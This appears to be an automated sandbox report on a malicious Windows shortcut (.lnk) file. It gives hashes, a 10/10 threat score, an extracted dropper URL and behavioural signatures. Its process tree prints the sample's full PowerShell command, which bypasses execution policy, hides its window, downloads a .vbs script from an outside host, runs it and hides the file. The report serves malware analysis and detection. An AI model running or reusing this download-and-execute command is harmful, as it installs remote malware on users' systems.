Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
10-12-2024 03:51
Static task
static1
Behavioral task
behavioral1
Sample
ea254e085f81b5d580391f4fab6ce4c462cd66485e7ef42a49f9f12ab158a362.lnk
Resource
win7-20241023-en
windows7-x64
6 signatures
150 seconds
General
-
Target
ea254e085f81b5d580391f4fab6ce4c462cd66485e7ef42a49f9f12ab158a362.lnk
-
Size
2KB
-
MD5
17af012abc0e526f7d02932f5a39d9db
-
SHA1
5df75915751923ef2ec5226e129b5107ec5ee56a
-
SHA256
ea254e085f81b5d580391f4fab6ce4c462cd66485e7ef42a49f9f12ab158a362
-
SHA512
af0fd0d4be8f3db60f122e37d1fe34ff0aeb066205b83aa13c128d0c3c4828651dee9774c9ef0413ae8f3eb65fa62f54054f830ee4aae33a07206086859a5c83
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2792 powershell.exe 6 2792 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2792 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2792 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2792 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1700 wrote to memory of 2792 1700 cmd.exe 31 PID 1700 wrote to memory of 2792 1700 cmd.exe 31 PID 1700 wrote to memory of 2792 1700 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ea254e085f81b5d580391f4fab6ce4c462cd66485e7ef42a49f9f12ab158a362.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass jqbinrdfgfdhozhdfboopntjfmdjtgfd -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792
-